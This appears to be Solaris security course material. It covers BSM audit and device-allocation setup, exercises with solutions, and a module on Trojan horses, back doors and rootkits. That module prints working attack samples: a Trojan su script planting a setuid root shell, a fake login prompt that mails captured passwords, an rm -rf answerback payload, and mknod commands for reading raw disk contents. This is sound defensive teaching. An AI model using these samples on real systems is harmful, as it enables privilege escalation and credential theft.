na non_attrib Non-attributable events

ad administrative Administrative actions: mount ,exportfs , and so on

lo login_logout Login and logout events

ap application Application auditing

io ioctl A ioctl(2) system call

ex exec System call

ot other Everything else

all all All flags set



Caution – The all flag can generate large amounts of data and fill upaudit file systems quickly, so use it only if you have extraordinary reasonsto audit everything. Even a simple task like compiling a program ofmodest size (for example, five files, 5000 lines total) in less than a minutecould generate thousands of audit records, occupying many megabytes ofdisk space.

Table 3-3 shows the prefixes that you can use to modify previously setaudit flags.

For example:

all, ad – audits all events except administrative actions.

-lo,+fd – audits all failed login events and successful file deletions

The audit_control and audit_user configuration files use flags andprefixes, as described in the following two sections.

Table 3-3 Audit Flag Modifiers

Prefix Definition

^- Turn off this type of auditing for failedattempts

^+ Turn off this type of auditing forsuccessful attempts

^ Turn off this type of auditing for bothfailed and successful attempts



Configuring the /etc/security/audit_control File

The audit daemon reads the audit_control file, which contains auditflags that control the type of audit records to be logged. Code 3-1 showsan example audit_control file.

Code 3-1 Example audit_control File

1 # Copyright (c) 1988 by Sun Microsystems, Inc.2 #3 #ident @(#)audit_control.txt 1.3 98/06/20 SMI4 #5 dir:/var/audit6 dir:/etc/security/audit7 flags:lo8 minfree:209 naflags:lo,nt



Line 5 specifies that the data is stored in the /var/audit directory. InLine 7, the flags field has been set to log only login and logout activityon the system. The minfree field on Line 8 specifies that when only20 percent of the audit data space is available (the file system where thedirectory resides is 80 percent full) the audit_warn shell script notifies theadministrator to archive or delete the audit data in the /var/auditdirectory. You could edit the audit_warn shell script so that it takesaction, such as compressing or moving files.

If more than one directory is specified with the dir field (as in Lines 5–6of Code 3-1 on page 3-19) when the minfree level is reached, auditdswitches to the next directory in the file. When none of the directories inthe list have enough minfree space left, the daemon starts again from thebeginning of the list and picks the first accessible directory with spaceavailable until the underlying directory size limit is reached.

By default, if all audit file systems fill up, the audit_warn issues warningsand the audit daemon remains in a loop sleeping and checking for spaceuntil space is freed. While there is no space, all auditable actions aresuspended. To free up space, you might choose to define a user with noattached auditing actions. Restrict this user’s ability to move or archive logfiles.

Note – Sometimes losing audit data is better than having systemactivities suspended due to audit trail overflow. You can build automaticdeletion, move audit files into the audit_warn script, or you can set theauditconfig policy to drop audit records when the auditing facility runsout of space.

The naflags field in Line 9 of Code 3-1 on page 3-19 contains the auditflags that define what classes of events are audited when an action cannotbe attributed to a specific user.



Configuring the /etc/security/audit_user File

The /etc/security/audit_user file lets you customize what isaudited at the user level. Use this file to audit some users differently fromothers.

Three fields for each user are stored in the audit_user file entry. Thesefields are stored on a single line and separated with colons. The first fieldis the username , the second field is the always-audit field, and the thirdis the never-audit field. The two auditing fields are processed insequence, so auditing is enabled by the first field and turned off by thesecond.

Code 3-2 shows an example of an entry in the audit_user file:

Code 3-2 Example audit_user File

1 # Copyright (c) 1998 by Sun Microsystems, Inc.2 #3 root:all:fr4 audit:no:



This entry specifies that all events by the root user (except successful filesystem reads) are audited.

Note – Avoid leaving the all flag set in the never-audit field. This flagturns off all auditing for the user, overriding the flags set in thealways-audit field.

Generating an Audit Trail

The audit daemon auditd creates and maintains the audit trail. Theauditd daemon collects audit trail data and writes it to the files specifiedin the /etc/security/audit_control file. The audit trail files are theaudit.log files.



Assessing the Responsibilities of the auditd Daemon

The auditd daemon performs the following tasks:

● Creates audit log files, in the order in which they are specified, in thedirectories specified in the audit_control file

● Reads audit data from the kernel and writes it to an audit log

● Executes the audit_warn script when the audit directories fill pastlimits specified in the audit_control file

Warning – If you use the default system configuration, all processes thatgenerate audit records are suspended when all audit directories are full.To avoid such suspension, ensure that you do not run out of disk space forauditing by configuring the audit scripts to delete or move files asdescribed earlier or by logging them to a remote system.

The audit daemon runs as the root user account; therefore, all filescreated by the auditd daemon are owned by root .



Examining audit.log Files

Audit data is stored in the directory named in the audit_control fileunder a name time-stamped as:

time auditing started.time auditing terminated.host name

A new audit file is created after each reboot. For example, a file producedon August 13, 2001, on a host named grommit would be named:

20010813213431.20010813221824.grommit

If the file has not terminated, it is named:

20010813222057.not_terminated.grommit



Interpreting the /etc/security/audit_data File

When the auditd daemon starts, it creates the file called/etc/security/audit_data . The file consists of a single entry with thetwo fields separated by a colon (see the audit_data manual page listed in“Additional Resources” on page 3-3). The first field is the audit daemon'sprocess ID, and the second field is the path name of the audit file to whichthe audit daemon is writing audit records. Code 3-3 shows an examplefile.

Code 3-3 Example /etc/security/audit_data File

# cat /etc/security/audit_data116:/var/audit/20010813222057.not_terminated.grommit

Interpreting and Filtering Audit Data



BSM provides two tools to merge, select, view, and interpret audit records.You can use the tools directly or in conjunction with third-partyapplication programs.

● auditreduce – Allows you to choose sets of records to examine

● praudit – Allows you to display audit records interactively andcreate very basic reports

Filtering Audit Data Using the auditreduce Command

The auditreduce command merges or selects particular audit recordsfrom one or more input audit.log files.



The auditreduce command can:

● Produce output containing audit records generated only by certainaudit flags

● Show audit records generated by a particular user

● Collect audit records generated on specific dates

The auditreduce command can specify sets of available records toexamine. For example, you can select all records from the past 24 hours togenerate a daily report. You can select records that pertain to a specificuser or event type. To create basic reports, use a pipe to direct the outputof this command to the praudit command.



Formatting Audit Data Using the praudit Command

The praudit command converts the binary audit records into readableAmerican Standard Code for Information Interchange (ASCII) andproduces basic reports. Generally, you combine auditreduce andpraudit commands to produce concise, readable output.

For example, the following command finds all of the login events for theuser eve in December 2001:

# auditreduce -a 20011201 -b +31d -u eve -c lo | praudit

This produces the following output:

header,81,1,login - rlogin,,Wed Dec 27 09:46:43 2001, +511485295 msecsubject, eve, eve, techies, eve, techies,10100,10100, 24 5, penguin text,successful login

This entry shows that user eve logged in to the system using the rlogincommand from the penguin system. Similar messages are generated forevents such as the ftp , telnet , and rsh utilities.



Controlling the auditd Daemon Using the auditCommand

The audit command provides an interface to the audit daemon. Theaudit command options inform the auditd daemon to close the currentlog file and to start a new one. The audit command can also temporarilystop auditing.

Note – If the audit command stops auditing, it is restarted after a reboot.To permanently disable auditing, use the bsmunconv command.

Implementing BSM Device Management



This section considers the security of I/O devices. In this section, securityis concerned with confidentiality and prevention of accidental ormalicious damage to data.

For example, in some environments, several users share a cartridge tapedrive. The drive is located away from the user workstations. Thisconfiguration creates opportunities for outsiders to gain access to data onthe unattended drive. When a user loads the tape and makes the tapedrive ready, the tape effectively becomes available to any user whoexecutes some kind of I/O operation on it.

The BSM device-allocation mechanism makes it possible to assign certaindevices to one user at a time so that the device can be accessed only bythat user while it is assigned to that user's name.

The device-allocation mechanism prevents:

● Simultaneous access to a device

● Other users from reading the media data just written



● Other users from overwriting the media

● Other users from obtaining information from the device’s or thedriver’s internal storage after another user is finished with thedevice

Configuring BSM Device Management

Some of the allocation mechanism components are the:

● allocate , deallocate , dminfo , and list_devices commands

● /etc/security/device_allocate file

● /etc/security/device_maps file

● Lock files that exist for each allocatable device in the/etc/security/dev directory

● Device-clean scripts for each allocatable device



Interpreting the /etc/security/device_maps File

The /etc/security/device_maps file defines the device file mappingsfor each device. This file associates all physical devices with a devicename (such as st0 ). You can edit the device_maps file by hand and usethe dminfo utility to report or update information about a device entry inthis file.

Each device is represented by a one-line entry, such as:

device-name:device-type:device-list



Table 3-4 defines the /etc/security/device_maps fields.

Note – The device-list field must contain all device files that allowaccess to a particular device. If the list is incomplete, a malevolent usercan still obtain or modify private information.

Code 3-4 shows an example of entries for Small Computer SystemInterface (SCSI) tape st0 and diskette fd0 .

Code 3-4 Example SCSI Entries

1 fd0:fd:\2 /dev/fd0 /dev/fd0a /dev/fd0b /dev/rfd0 /dev/rfd0a /dev/rfd0b:3 st0:st:\4 /dev/rst0 /dev/rst8 /dev/rst16 /dev/nrst0 /dev/nrst8 /dev/nrst16:

Note – Although the bsmconv command creates a device_map file whenBSM is enabled, you should only use this initial map file as a startingpoint. You must augment and customize the device_maps file for theindividual site.

Table 3-4 The /etc/security/device_maps Fields

Field Name Description

device-name The device name, such as st0 , fd0 , or audio .

device-type The generic device type (the name for the class of devices such asst , fd , audio ). The device-type logically groups related devices.

device-list A list of the device files associated with the physical device. Thiscan be the real device files located under the /devices directoryor the symbolic links in the /dev directory, provided for binarycompatibility.



Interpreting the /etc/security/device_allocate File

Devices that can be allocated are listed in the/etc/security/device_allocate file. This file contains mandatoryaccess control information about each physical device managed by thedevice-allocation mechanism. This is a per-system file and cannot bedefined as a name services resource (for example, an NIS map or NIS+table object, or Lightweight Directory Access Protocol (LDAP)).

In the device_allocate file, each device is represented by a one-lineentry:

device-name;device-type;reserved;reserved;alloc;device-clean



Table 3-5 defines the /etc/security/device_allocate fields.

When BSM is enabled with the /etc/security/bsmconv command,default devices and their characteristics are automatically defined in theetc/security/device_allocate file.

Code 3-5 shows an example etc/security/device_allocate file.

Code 3-5 Example etc/security/device_allocate File

1 audio;audio;reserved;reserved;solaris.device.allocate; \2 /etc/security/lib/audio_clean3 fd0;fd;reserved;reserved;solaris.device.allocate; \4 /etc/security/lib/fd_clean5 sr0;sr;reserved;reserved;solaris.device.allocate; \6 /etc/security/lib/sr_clean

Table 3-5 The /etc/security/device_allocate Fields

Field Name Description

device-name The device name, such as st0 , fd0 , or audio .

device-type The generic device type (the name for the class of devices such asst , fd , and audio ). The device-type logically groups relateddevices.

reserved These fields are reserved for future use.

alloc Specifies whether the device can be allocated. This field containsa comma-separated list of authorizations (see the Solaris OEmanual page for device_allocate for the appropriate authsvalues) required to allocate the device. An asterisk (* ) indicatesthat the device is not allocatable, and an ampersand (&) indicatesthat no explicit authorization is needed to allocate the device.

device-clean The path name of a program to be invoked for special handling,such as cleanup and object-reuse protection during theallocation process.



The Device-Clean Scripts

The device-clean scripts ensure that any data left on a device by a user iscleared before the device is allocated to another user.

Enabling BSM automatically provides several device-clean scripts. Thesesupport the following standard devices:

● SCSI 1/4-inch tape (st_clean )

● Archive 1/4-inch tape (st_clean )

● Open-reel 1/2-inch tape (st_clean )

● Diskette (fd_clean )

● CD-ROM (sr_clean )

Note – If you add more allocatable devices to your system, you mighthave to write your own device-clean scripts. Design the script so that itaccepts any parameters passed from the deallocate command.



Authorizing Users to Access Devices

The /etc/security/auth_attr file defines authorizations.Authorizations grant users access to certain system functionality. Code 3-6shows entries in the authorizations file.

Code 3-6 Entries in the Authorizations File

1 solaris.device.:::Device Allocation::help=DevAllocHeader.html2 solaris.device.allocate:::Allocate Device::help=DevAllocate.html3 solaris.device.config:::Configure DeviceAttributes::help=DevConfig.html4 solaris.device.grant:::Delegate DeviceAdministration::help=DevGrant.html5 solaris.device.revoke:::Revoke or Reclaim Device::help=DevRevoke.html

Solaris OE supplies the authorizations file, you do not need to edit thisfile.



You can grant a user access to an authorization, such as Solaris OE devicemanagement, by adding an auths entry to the line in the/etc/user_attr file and quoting the required authorization. Do thisusing the usermod or useradd commands. The following example grantsthe user authorization to all the solaris.device commands, as shown inCode 3-6 on page 3-37:

# usermod -A "solaris.device.*" alice



Device Allocation and De-Allocation

Use the following commands to allocate and de-allocate devices. See theSolaris OE manual pages (“Additional Resources” on page 3-3) for moreinformation on these commands.

● The allocate command – Assigns a device to a user. For example:# allocate st0

A superuser can reallocate a previously allocated device to a newuser with:# allocate -F st0 -U fred

● The deallocate command – Releases a previously allocated device.For example:# deallocate st0

● The list_devices command – Lets you view a list of all allocatabledevices, devices currently allocated, and allocatable devices notcurrently allocated.

● The dminfo command – Reports and updates information about adevice in the device_maps file.



Managing Devices Using BSM

This section shows how to use BSM to manage and add new devices.

To manage devices:

1. Edit the device_map file and add any new device names and all theassociated physical devices.

2. Edit the device_allocate file to define which devices should bemade allocatable.

3. Use authorizations to decide which regular users, if any, should beallowed to allocate devices. Use the usermod -A command.

4. Create an empty lock file for each allocatable device in the/etc/security/dev directory. The lock file name should coincidewith the device name in the device_map file. Ensure that the lockfile is owned by root and is set with the following permissions:

-r-------- 1 root bin 0 Jan 6 2000 st0



5. Create a device-clean script, if needed, for each new device.

6. Make all device files for the device owned by user bin , group bin ,and mode 000 .

If BSM has been started, the devices defined in the device_allocate fileare now under device allocation control. Only users authorized in Step 3can access these devices.

Exercise: Using the Basic Security Module




● Install BSM and configure auditing for users

● Examine audit data and manage the audit file

● Restrict access to the floppy drive using device allocation features

Preparation

No preparation is required for this exercise.

Tasks

To complete the first task, you install and configure auditing. After youreboot, system auditing begins and the log files continue to grow untilauditing is switched off. Although you are not required to finish all of thetasks in the time allocated by the instructor, be sure to disable BSM andreboot the system before moving on.

Task – Installing and Configuring BSM

In this task, you configure your system to use the BSM to log events. Youbegin by logging some specific events. Later, you log all events andcompare the amount of data.

Follow these steps:

1. Run the bsmconv script to begin auditing. This script starts theaudit daemon after the system is booted, but do not reboot the systemyet.

2. Before rebooting, configure the types of activity that BSM audits onyour system. Edit the /etc/security/audit_control file, whichcontrols system-wide auditing.



a. Edit the file to instruct the auditd daemon to create the first(primary) audit log in the /var/audit directory. If the primarylog file consumes more than 90 percent of the available space,configure the audit daemon to close the current log and start anew one in the /var/audit1 directory.

b. Remove old audit files from the /var/audit directory.

c. Instruct the auditd daemon to record all successful orunsuccessful logins and logouts, all successful or unsuccessfuladministrative actions, and all failed file attribute changes thatcan be attributed to users.

Note – Because you are not monitoring non-attributable events, do notedit the naflags: line.

3. Qualify the amount of data to be logged for the user alice bymodifying the entry for root in the /etc/security/audit_userdirectory as follows. This entry specifies that all events by alice ,except for successful file reads, should be audited:

# vi /etc/security/audit_useralice:all:fr

4. If the file system holding the audit logs fills up, you might not beable to access your system. To prevent this scenario for theseexercises, disable logging for the root user.

Note – Disabling auditing for root is not an option on most systems.Instead, create a user account which can only clean up audit file space ordisable BSM. Disable logging for this user.

5. Reboot the system to begin auditing.

Task – Monitoring Audit Data

Auditing should now be enabled. Go through the following steps tomonitor the audit data that is being collected:

1. After the system has rebooted, log in as root in one window andalice in another.

2. From the root account, use the following commands to determinewhat process ID the audit daemon is using and where the auditdata is being stored:

# cd /etc/security# cat audit_data



3. Change to the /var/audit directory.

4. Use the praudit command to examine the audit file.

a. From the alice user account perform some actions (such as cdor ls ) .

b. Re-examine the audit file to see the additional records (youmight want to save each command output to file and look forthe differences with the diff command).

5. Use the audit command to close the current log file and open a newlog file.

# cd /var/audit# ls -l# audit -n# ls -l

6. Use the audit command to temporarily stop auditing and check thatthe audit log stops growing.

# audit -t

Task – Securing a Peripheral Device

Use the device allocation mechanism to secure a peripheral device (whichfor this exercise is the diskette device):

1. Examine the /etc/security/device_allocate file. The firstcolumn of the file lists all devices that are allocatable to a particularlogin on the system.

# cat device_allocateaudio;audio;reserved;reserved;solaris.device.allocate;/etc/security/lib/audio_cleanfd0;fd;reserved;reserved;solaris.device.allocate;/etc/security/lib/fd_cleansr0;sr;reserved;reserved;solaris.device.allocate;/etc/security/lib/sr_clean

2. Log in as user alice in a second window and issue the followingcommand to determine if alice can reserve the floppy disk.

alice$ /usr/sbin/allocate fd0



3. Edit the /etc/security/device_allocate file and change theentry for the device fd0 as follows:

fd0;fd;reserved;reserved;@;/etc/security/lib/fd_clean

Note – The @ character inserted into the/etc/security/device_allocate file allows all users to allocatedevices. The alternative is to give only alice and bobsolaris.device.allocate privileges. To do this, add the followingentries for alice and bob in /etc/user_attr :

alice::::type=normal;auths=solaris.device.allocatebob::::type=normal;auths=solaris.device.allocate

4. From the alice user account reissue the allocate command. Canalice reserve the device now?

5. Insert a diskette into your diskette drive. As alice , allocate thediskette drive for your exclusive use and then create a tar archive ofthe /etc/motd file.

alice$ /usr/sbin/allocate fd0alice$ cd /etcalice$ tar cvf /dev/fd0 motd

6. Log in as the user bob , then try to copy the file from the tar file youcreated in the previous step. Did this work?

bob$ tar xvf /dev/fd0

7. As bob , try to allocate the diskette drive for your use. Did this work?

bob$ allocate fd0

8. Examine the lock file to determine who has the device allocated.

# ls -l /etc/security/dev

9. As user alice , de-allocate the diskette drive.

alice$ /usr/sbin/deallocate fd0

10. As bob , allocate the diskette drive. Can you extract the motd filenow? What implications does this have?



Task – Disabling BSM Auditing

This task disables auditing on your system. You must perform this task,even if you have not completed all the other tasks, to ensure that the auditlogs do not grow too large and cause system problems.

1. Log in as root and run the bsmunconv command to permanentlydisable auditing.

# cd /etc/security# ./bsmunconv

2. Remove any files in the /var/audit directory.

3. Reboot the system.

Exercise Summary


Exercise Summary

?!


● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions

The following are the solutions to the tasks.

Installing and Configuring BSM

The /etc/security/audit_control file should look like:

1 # Copyright (c) 1988 by Sun Microsystems, Inc.2 #3 #ident @(#)audit_control.txt 1.3 98/06/20 SMI4 #5 dir:/var/audit6 dir:/var/audit17 flags:lo,ad,-fm8 minfree:109 naflags:

Monitoring Audit Data

As this exercise is prescriptive, there is no solution.

Securing a Peripheral Device

Use the device allocation mechanism to secure a peripheral device:

4. The user alice can reserve the device.

6. The user bob cannot copy the tar file.

7. The user bob cannot allocate the device.

8. You should see that the alice user owns the lock file.

10. The user bob can now allocate the drive and extract the motd file.The implication is that BSM can aid security, but not if your userscarelessly leave sensitive data in the drive.

Disabling BSM Auditing

As this exercise is prescriptive, there is no solution.


Module 4

Security Attacks

Objectives


● Recognize and detect the following common security attacks and listat least two consequences of each:

● Trojan horses

● Back door attacks

● Denial of Service (DoS) attacks

● Describe how attackers can use a rootkit to cover their tracks

Relevance


Relevance

?!

Discussion – Reports of system and server attacks are a dailyoccurrence.

● Could you recognize the most common types of attack?

● Can you be sure that your system files have not been modified toperform additional tasks?

● Can you identify measures to prevent DoS attacks?

● Is prevention always possible?


Security Attacks 4-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C



● Garfinkel, Simson and Gene Spafford. Practical UNIX & InternetSecurity. O’Reilly & Associates, Inc., 1996.

● Schneier, Bruce. Secrets & Lies. John Wiley & Sons, 2000.

● Scambray, McClure, Kurtz. Hacking Exposed. Osborne McGraw-Hill,2001.

● Online tripwire resources:[http://www.tripwire.com/]

● Online ASETinformation:[http://www.sun.com/]

● Solaris OE Fingerprint Database:[http://sunsolve.sun.com/]

● Solaris OE AnswerBook 2.

● Solaris OE online manual pages for limit(1) , kernel(1M) ,modinfo(1M) , modload(1M) , proc(1M) , quot(1M) , strip(1) ,tunefs(1M) , and ulimit(1)

Recognizing Trojan Horses



The concept of the Trojan horse is borrowed from the Greek battle for thecity of Troy. Greek soldiers hid inside a large wooden horse which theTrojans, assuming it was a gift, brought into the city of Troy. The Greeksoldiers later climbed out of the horse and killed everyone in the city.

Software is described as a Trojan horse when it performs an expectedfunction, but also executes additional commands which subvert thesecurity measures in place or cause damage to the system.



Example Trojan Horses

This section provides several examples that illustrate the common typesof Trojan horse problems.



Changing the Search Path to Hide Standard System Utilities

A user produces a Bourne shell script called su , shown in Code 4-1.

Code 4-1 Trojan Horse Example Shell Script

# cat su#!/bin/sh/bin/cp /usr/bin/ksh ./ksh/bin/chmod 4775 ./ksh/bin/rm $0/bin/su "$@"

For the example in Code 4-1 to work, the user sets the search path so thatthe current directory is at the front of the search path. Now the usercreates a problem in their directory which requires superuser privileges tofix.



When the administrator runs the su command from the user’s terminal orTelnet session, the administrator picks up the Trojan Horse su commandinstead of the real one, which creates a back door shell (owned by rootwith set-user-id). The su command removes itself after it has served itspurpose.

A good administrator defends against this attack by always using the fullpathname for the su command (/bin/su ).



The root Path

Because of the risk of running the wrong program, the root user’s $PATHvariable should never include the current directory. In general, aprivileged account should not have a directory in its search path that iswritable by others.

The latest versions of the su command reset the PATHvariable for theroot user when you use the su command to change to the root user. Theroot path is defined by the variable SUPATHin the /etc/default/sudirectory and should be set to a search path which does not include thecurrent directory.

Test your knowledge of the PATHvariable by deciding which of these pathscontains the current directory:

1. PATH=/usr/bin:/usr/sbin:/usr/openwin/bin

2. PATH=/usr/bin:/usr/sbin:.:/usr/openwin/bin

3. PATH=/usr/bin:/usr/sbin:.

4. PATH=/usr/bin::/usr/sbin



5. PATH=/usr/bin:/usr/sbin:

6. PATH=:/usr/bin:/usr/sbin

Terminal Answerback

This form of Trojan horse uses the answerback modes of some terminals.Many brands of terminal and software terminal emulators used by thetelnet command accept control character sequences which can echo backto the host a line of text as if it had been typed at the terminal.

For example, a command like:rm -rf $HOME <clear-screen, send-sequence> , where clear-screen and send-sequence are replaced with the appropriate controlcharacter sequences, could be embedded in an email. When the user readsthe email and the screen goes blank, it is already too late because the rmcommand has been executed.

Answerback should be disabled on all terminals where it is present.



A Console Logout Trojan Horse

Another basic Trojan horse (known to intruders as well as to mostcomputer science undergraduates) is a shell script that spoofs the loginprogram, as shown in Code 4-2.

Code 4-2 Using a Trojan Horse to Gain Passwords

1 #!/bin/sh2 # this script is left running instead of logging out3 trap '' 2 3 154 /usr/ucb/clear5 /bin/echo "`hostname login: \c"6 read x7 /bin/echo "Password: \c"8 /bin/stty -echo9 read y10 /bin/echo11 /bin/stty echo12 /bin/echo $x $y | mail user &13 /bin/echo "login incorrect"14 exec login



A simple defense for this kind of attack is to enter Control-D beforelogging in.

Other Terms for Trojan Horses

A logic bomb is a Trojan horse that is left dormant in a program until it istriggered by some event or condition. A Trojan mule is a simple Trojanhorse.

Identifying Back Doors



Back doors, or trap doors, are ways to access a system without goingthrough the normal authentication process.



Recognizing Common UNIX Back Doors

Programmers often write back doors in their programs for access fordebugging or monitoring. If the programmer forgets to remove the backdoor before the program is released, this can be a problem.

The most infamous UNIX example of a back door is in the sendmailprogram. The developer used a DEBUGcommand to aid debugging. Thiscommand allowed any user with remote access to the sendmail programto run a command with root privileges. This back door was exploited bythe Internet worm (see “The Internet Worm” on page 4-31).



Common UNIX back door attacks include the following:

● Install an altered version of programs such as login , telnetd , ftpd ,or any program that spawns a shell

● Add an entry in a .rhosts file to allow future unauthorized access

● Change the /etc/vfstab file on an NFS-mounted file system toremove the nosuid option, thus allowing SUID programs to be run

● Add a mail alias so that when email is sent to the alias, a programruns which provides root access

● Change ownership of files such as the /etc/shadow file so that theycan be read or modified

● Change ownership of physical devices such as the physical devicefile /dev/kmem which provides access to kernel memory

● Install a SUID file that provides access to a superuser shell

● Change or add a network service to provide access to a remote user



Using Devices to Create a Back Door

Special files or files found in the /etc or /devices directories are likelytargets of an intruder attack. Device files can provide back door entries forattackers.

One way to view restricted files is to create a special character file usingthe mknod command. If the file is created with the same major and minordevice numbers as an existing disk device file, and has read permissions,users can view the entire contents of the disk. If users have additionalwrite permissions, they can change or destroy valuable data. Attackerscan use a symbolic debugger (such as fsdb ) or similar tools to read andalter the data.



The following commands demonstrate how a user without root-userprivileges can view restricted files. In Code 4-3, the user uses the lscommand to obtain the major and minor device numbers of the targetdevice (in this case the disk slice c0t3d0s2 ).

Code 4-3 Obtaining Target Device Numbers

$ ls -lL /dev/dsk/c0t3d0s2brw-r----- 1 root sys 32, 26 Apr 5 1999 /dev/dsk/c0t3d0s2

In Code 4-3, 32 and 26 are the major and minor device numbers,respectively. Using these device numbers, the successful attacker uses themknod command to create a special character file (Code 4-4):

Code 4-4 Creating a Special Character File

# mknod /export/home/fred/.secret_file c 32 26# chown user /export/home/fred/.secret_file# chmod 600 /export/home/fred/.secret_file

Note – A user must have root-user privileges to execute the mknodcommand otherwise any user, not just a successful attacker, could easilyobtain direct access to any system device.



When the special file exists, and the ownership has been changed, the userno longer needs to be the root user to gain access to everything on thedisk. The back door has been created. The users can use the followingcommand to look at the contents of files on the system:

$ strings -a /export/home/fred/.secret_file | grep -i root:

In this example, the attacker might be looking for the encryptedroot -account password in the /etc/shadow file.

Do not expect attackers to use descriptive names such as .secret_file .Creative file naming is important to avoid detection. Attackers bury files inlarge system directories such as /usr/lib and disguise the files toachieve their goals. Always use the ls -a command when listing files insuspect directories to help reduce your chances of missing hidden files.

To prevent such attacks, periodically scan the file systems for special filesand check the permissions on them. Character files normally exist in the/devices and /proc directories. Any special file found outside thesedirectories should be considered a security vulnerability.

Detecting and Preventing Trojan Horse and Back Door Attacks


Detecting and Preventing Trojan Horse and Back DoorAttacks

You can use various tools and methods to detect changes made to systemfiles. The following sections describe tools that can help you detect thesechanges.

The Solaris OE Fingerprint Database

This SunSolveSM service lets you verify the integrity of files distributedwith the Solaris OE. The Solaris OE Fingerprint database ensures that youare using a true file in an official binary distribution, and not using analtered version that can compromise system security. If you suspect thatsomeone has changed your system without your authorization, use theSolaris OE Fingerprint Database to check files for alteration or damage(see Module 9, “Auditing File Systems”).



TripWire

The TripWire freeware product monitors file changes, verifies integrity,and notifies you of any violations of data located on network servers. TheTripWire program also identifies changes to system attributes includingfile size, access flags, write time, and more. Tripwire can also generateMD5 checksums for binaries (see Module 9, “Auditing File Systems”).

Checklists, File Digests, and Checksums

A simple way to detect changes to a file system is to store a checklistcreated with the ls command. For example, the following example createsa file listing. Subsequently running the same command and comparingthe two outputs with diff detects any changes:

# ls -ild /usr/bin/* > /usr/adm/filelist

Note – An attacker can modify the file list to cover up any changes.

However, an attacker can change a file that is not detected by this type ofbasic checklist.

To improve the checklist, use the sum command to generate a cyclic-redundancy-check (CRC) checksum and block count for each file. Forexample, the following example creates both a file listing and a CRCchecksum for each file in the /usr/bin directory:

# find /usr/bin -ls -type f -print | xargs sum >/var/security/filecheck

However, because well-known polynomials can generate a CRC, anattacker can alter a file so that it still generates the same checksum. Thereare stronger checksums available, including the MD5 digital message-digest algorithm.

The BSM Audit Trail

If you have initiated auditing and set the appropriate flags to monitorwriting to files, you can detect changes to system files.



Using the find Command

Using more sophisticated tools for fingerprinting and checking systems isthe preferred route for securing your system against user attacks. Butwhere these tools are not available, or the system has not yet beenfingerprinted, the find command is a good alternative.

The find command has many useful options for searching for potentialTrojan horses or back doors. Table 4-1 shows some of the find commandoptions.

Multiple selection criteria can be combined using the symbols in Table 4-2.

Table 4-1 The find Command Options

Option Description

-nouser Files not owned by a valid user

-user user Files owned by the user specified

-perm -perms Files with one or more permissions set

-mtime -days Files modified in the last few days

-newer file Files newer than a specified file

Table 4-2 Operators for Combining Selection Criteria

Symbol Definition

$ ….. $ Group or separate logical criteria

-a And

-o Or

! Not



Example find Commands

Some example find commands are:

● Find all files in the /usr directory modified in the last 24 hours:

find /usr -mtime -1 -print

● Find all files owned by the root user in the user’s home directory:

find /export/home -user root -print

● Find all set-user-id files owned by the root user in the /usr/bindirectory:

find /usr/bin -user root -perm -2000 -print

● Files or directories owned by root and writable by others:

find / -user root $ -type f -o -type d $ -perm -2 -print



Preventing Trojan Horse and Back Door Attacks

You can implement the following recommendations to reduce the risk ofan attacker placing a Trojan horse on your system:

● Your first task in preventing Trojan horses is to harden the filesystem. This involves:

● Removing write access from all directories that do not require it

● Ensuring that the file and directory permissions are as secure aspossible

● Removing programs that are not required (in particular,compilers)

● Check the validity of software loaded onto your system. Do notautomatically trust software, even if it is from a reputablecommercial firm. You should install all new software on sparemachines for testing, not on critical production systems.



● Consider using the Automated Security Enhancement Tool (ASET).ASET is a set of administrative utilities that can improve systemsecurity by checking the settings of system files, including both theattributes (such as permissions and ownership) and the contents ofthe system files. It warns of potential security problems and, whereappropriate, sets the system files automatically according to thesecurity level specified. ASET is discussed in Module 14 “Hardeningthe System.”

Note – Pay particular attention to scripts in the rc*.d directories toensure that back doors have not been installed there. Systemadministrators have spent considerable time cleaning a system only tohave the back doors reappear after a reboot.

Rootkits – Understanding How Attackers Use Them



Rootkits are utility programs that attackers use to hide their presence on asystem and to give them back door access in the future. The big appeal tothe average attacker is that rootkits do not require any great expertise orknowledge to run them. Intruders do not use rootkits to gain root accessto the system but rather to hide and secure their presence when systemsecurity has been breached.

The initial attack that gives attackers superuser access was probably‘noisy,’ generating a lot of network traffic and hopefully a great deal of logor audit data. When root access has been obtained, attackers have nodifficulty covering their tracks using the rootkit utilities. Intruders haveprograms in the rootkit that remove login entries from the wtmpx, utmpx ,and lastlog files. Other shell scripts can clean up log entries in files suchas /var/log and /var/adm .



Installing Back Doors and Trojan Horses

After removing all evidence that the system has been breached, anintruder can leave a back door to gain root access again at any time.

Common rootkit back doors are:

● Replacing login , passwd , or sh/ksh /csh commands to allow theintruder to spawn a root shell at any time. The smart intruder alsodisables any history mechanism on this shell.

● Replacing the rsh shell so that a root shell is spawned when thespecial rootkit user name is given (for example, rsh hostname -lrootkit_user ).

● Binding a root shell to an unusual port number.

An intruder might install all of these back doors so that if the originalsecurity hole that allowed root access in the first place is fixed, theintruder still has numerous ways to access your system. In addition, whilelogged in as the root user, the intruder might install a sniffer program toobtain account passwords on other systems. Therefore, even if the originalbreached system is taken out of operation to be reinstalled, the intrudermight already have gained access to the rest of your network.

Table 4-3 shows other Trojan horse programs that commonly form part ofthe rootkit.

Table 4-3 Rootkit Trojan Horse Programs

Program Effect

ls , find , du Does not display or count the attacker’s files.

ps , top Does not display the attacker’s processes.

netstat Does not display the attacker’s traffic.

killall Does not kill the attacker’s processes.

ifconfig Does not display the word PROMISC when sniffer is running.

crontab Hides the attacker’s crontab entry. The hidden crontab entry isnot in the /var/adm/cronjobs directory.

tcpd Does not log attacker connections listed in the configuration file.

syslogd Does not log attacker activity.



Detecting Rootkit Use

Techniques for detecting Trojan horses and back doors were presented in“Detecting and Preventing Trojan Horse and Back Door Attacks” onpage 4-18. If the intruder has been careless, you can also detect the use ofa rootkit.

Often, the programs listed in Table 4-3 on page 4-25 that are replaced withTrojan copies have configuration files that list which programs to hide andwhich to display. Sometimes the intruder forgets to hide theseconfiguration files. Most of the files in the /dev directory are symboliclinks, and the /dev directory is the default location for many of theseconfiguration files, so check there for any normal files. The default setupfor many rootkits is to have the configuration file begin with pty , such as/dev/ptys or /dev/ptyr .



In addition, look at modification times of all programs. Although goodattackers fix the modification times on back doors and Trojan horses, theysometimes forget to do so on a few files or directories. Use the followingcode line (where N is the number of days you believe that the attacker hashad access to your system):

# find / -mtime -N -print

Inside each modified directory, compare the output of echo * with ls . Ifthe ls file has been replaced with a Trojan copy and configured to hideanything, the echo command shows it.

